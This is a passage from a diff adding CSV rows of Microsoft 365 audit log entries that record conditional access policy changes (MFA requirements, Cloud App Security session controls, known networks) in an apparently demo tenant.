+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:01Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:01Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:01 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:01Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:00Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:00Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:35:00 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:35:00Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:34:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T01:34:59Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 1:34:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:19 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-11T04:57:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:19 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T04:57:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 4:57:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:46Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:46 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:45Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:45 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:44Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/12/2020 4:48:44 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-12T04:48:45Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
